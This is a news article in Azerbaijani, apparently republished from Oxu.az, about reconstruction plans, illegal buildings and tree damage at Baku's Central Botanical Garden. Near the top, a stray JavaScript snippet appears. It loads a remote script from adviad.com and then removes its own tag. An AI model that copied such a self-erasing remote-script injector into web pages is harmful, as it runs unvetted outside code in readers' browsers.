Nəbatat Bağı abadlıq sevdasında: Burada hansı yeniliklər gözlənilir? – FOTOREPORTAJ

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Ölkəmizdə bütün sahələrdə inkişaf və yenidənqurma işləri aparılır. Cəmiyyət olaraq bütün bu addımlar yüksək qiymətləndirilir. Söhbət inkişafdan gedərkən qeyd etmək yerinə düşər ki, bu gün ölkə başçısı İlham Əliyev Mərkəzi Nəbatat Bağının ərazisində abadlıq, yenidənqurma və tikinti işlərinin həyata keçirilməsi ilə əlaqədar tədbirlər haqqında sərəncam imzalayıb.

Xoş təsadüfdür ki, “Global Photo Stock”un və Oxu.Az-ın əməkdaşları bu gün sözügedən Nəbatat Bağında olaraq mövcud vəziyyətlə maraqlanıblar.

Nəbatat Bağı haqqında danışarkən onun turizmə verə biləcəyi töhfə unudula bilməz. Bir çox ölkələrdə, eləcə də qonşu Gürcüstanda yerləşən botanika bağları bu gün turizm sektorunda əhəmiyyətli yer tutur.

Təəssüf ki, bizdəki Nəbatat Bağından bu məqsədlə çox geniş istifadə edilmir. Lakin mühüm təbiət abidəsi kimi, ekoloji təmizliyin qorunması, təbiətin mühafizəsi və əhalinin bütün təbəqələri üçün elmi araşdırma, tədris və maarifləndirmə baxımından əhəmiyyətli rola malik Mərkəzi Nəbatat Bağında abadlıq, yenidənqurma və tikinti işlərinin həyata keçirilməsi üçün Azərbaycan Respublikası Prezidentinin ehtiyat fondundan Bakı Şəhər İcra Hakimiyyətinə ilkin olaraq 25 milyon manat ayrılıb. Bu da o deməkdir ki, yaxın gələcəkdə Nəbatat Bağı da digər ölkələrdəki Botanika bağlarından heç də geri qalmayacaq.

Burada dünyanın müxtəlif iqlim zonalarından toplanan canlı bitki kolleksiyaları yalnız bitkilərin mühafizəsi məqsədilə deyil, həm də ölkədə bu sahədə elmi tədqiqatların davamlı inkişafına xidmət edir.

Nəbatat Bağında bir sıra qanunsuz tikinti işləri aparılıb. Eyni zamanda ağaclara ziyan dəyməsi ilə bağlı da bir sıra faktlar mövcud olub.

Bəs görəsən bu istiqamətdə ciddi tədbirlər görülür və ya görüləcəkmi? Nəzarət tədbirləri daha gücləndiriləcəkmi?

Məsələ ilə bağlı Bakı Şəhər İcra Hakimiyyətinə sorğu ünvanladıq. Oxu.Az-ın sorğusuna cavab olaraq bildirilib ki, Bakı şəhərinin mərkəzində yerləşən Mərkəzi Nəbatat bağında vaxtı ilə bəzi məsuliyyətsiz şəxslər tərəfindən bir sıra tikililərin inşasına yol verilib:

“Həmçinin parkda yerləşən ictimai-iaşə obyektlərindən havaya qalxan tüstü və his də ərazidəki ağaclara ziyan verir. Bu yaxınlarda ölkə başçısı İlham Əliyev və Birinci vitse-prezident Mehriban Əliyevanın tapşırıqlarına uyğun olaraq Mərkəzi Nəbatat bağının ərazisi üçün hazırlanan unikal layihə əsasında əsaslı yenidənqurma işləri aparılmasına başlanılacaqdır.

Bununla əlaqədar olaraq hazırda burada təmizlik işləri aparılır, ərazi qaydaya salınır, qanunsuz tikililər sökülür və qısa zaman ərzində yeni layihəyə uyğun burada sakinlərin asudə vaxtının təşkili üçün şərait yaradılacaqdır. Hazırda bu tikililərin hüquqi yollarla sökülməsi üçün müraciət olunub”.

Qeyd edək ki, sözügedən təmir-bərpa və yenidənqurma işləri çərçivəsində Nəbatat Bağının fəaliyyətinin müvəqqəti olaraq dayandırılıb-dayandırılmayacağı ilə bağlı hələlik heç bir məlumat yoxdur.

Nəbatat bağını daha gözəl, daha rəngarəng görəcəyimizə ümid edirik.

“Global Photo Stock”un əməkdaşının çəkdiyi fotoları təqdim edirik:

Könül Cəfərli
FOTO: Tapdıq Abdullayev

Oxu.az

Bu yazılara da göz atın...